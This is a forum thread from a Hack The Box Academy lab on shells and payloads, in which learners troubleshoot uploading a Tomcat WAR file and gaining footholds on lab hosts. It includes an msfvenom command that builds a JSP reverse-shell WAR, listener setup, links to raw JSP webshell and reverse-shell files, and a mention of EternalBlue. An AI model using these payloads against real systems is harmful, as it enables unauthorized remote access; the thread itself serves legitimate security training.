[Academy hack the box][Shells & Payloads][The Live Engagement][Lightweight facebook-styled blog 1.3]

HTB Content
21

your welcome bro :slight_smile:

22

Hey Everyone,

I am desperately trying to get the Tomcat war file upload going.

i already messaged with 2 members and got useful insight but still no shell
so i break it down again

I know that it is a windows system and tomcat is java
i got the tomcat credentials and log in
i use msfvenom -p java/jsp_shell_reverse_tcp with LHOST=my_IP LPORT=4444 -f war -o shell.war
i start a listener netcat or msfconsole exploit/multi/handler
i upload the payload and click on it in the browser

nothing happens.
i tried other payloads as well but then tomcat throws errors
i even wrote my own jsp to print Hello HTB with guidance from this link
HTB{ Jerry } (epi052.gitlab.io)
but nothing ā€¦
i thought that maybe i need to put the address 172.16.1.11:8080/shell in the /etc/hosts but no
i followed this video Exploiting Apache Tomcat - YouTube
no luck
I tried to troubleshoot the payload like in this link
eighty-two - Why an MsfVenom WAR payload might return a 404 (eightytwo.net)
no

What am i missing ? :cold_sweat: :roll_eyes: :exploding_head:

23

I solved it manually, without Metasploit.

Here you can download a webshell
https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp

Then put the file into a war file.

The hosts file is there to translate domain names into IP addresses.
Entering an IP address without a domain name makes no sense :wink:

25

are you sure your inputting the correct IP? there should be a few listed, from what you wrote it looks like your doing it correctly to me.

Also just to make sure, you are using the parrot box that you connect to via no machine to setup the listener, correct?

26

Hey! Thank you for your reply !
I will definitly try this payload, i only thought, this Academy modul introduced metasploit and the videos and articles i read used it (with succsess :smiley: )
but i will give it a try :slight_smile:

thanks for the host file insight !

28

Hi,
I got the same error message when using the exploit.
Can you help me out, please?

29

Hey, Would you mind helping me please, i have been stuck on this for long time now, tried too many different thing but nothing is working, your help will be much appreciated.

30

Hello :slight_smile: How do you get to use it on metasploit?! I get an error when I type updatedb after I copied into the msf4 folder :frowning: :frowning:

31

How do you get it working in your msfconsole?! My msfconsole can`t find that exploit after I have done all the mkdir/updatedb process

32

Some problem about Host-02 (Blog) that I would like to ask:
Do you use browser ā€œLinks 2ā€ which is installed on the foothold machine to browse the page http://blog.inlanefreight.local:80? Links 2 is to slow for browsing the page and it canā€™t show some element on the page (eg: login button). Do you have another way to browse the page ? Thank you.

33

Hi the same problem has already broken a my head can you please tell me what Iā€™m doing wrong :slight_smile:

34

You ever figure this out? I also canā€™t figure out how people are browsing to these machines on port 8080 or 80 without firefox on the foothold PC.

35

Hey mate,
create a war file and replace the jsp file with the web shell payload in the given link.
https://raw.githubusercontent.com/tennc/webshell/master/jsp/jsp-reverse.jsp
Hope this helps
Happy Hacking

36

Hey anyone can expalin how to get the host3 file, I got a shell but unable to fetch the flag, it is asking for administrator privileges

1 Like
37

You can use msfconsole and check if it`s vulnerable for ethernal blue!

38

solved it already mate, thanks.

39

can someone help me with finding the flag on the blog.inlanefreight.local one. I can get a shell through the msfconsole. Do I then have to drop into a system shell? I canā€™t get it to be interactive.

in either meterpreter or the system shell, i canā€™t find the /customscripts/flag.txt for the life of meā€¦any pointers?

40

okay, i figured it out. I donā€™t know why couldnā€™t find the location of the /customscripts folder. I ended up searching for it using

find / -type f -name flag.txt 2>/dev/null

and then piping the results to cat by setting the find as an env variable.

> cat $(find / -type f -name flag.txt 2>/dev/null

41

why there is no browser on my foothold machine ?

43

You can use BurpSuiteā€™s browser, thatā€™s what I did :smiley: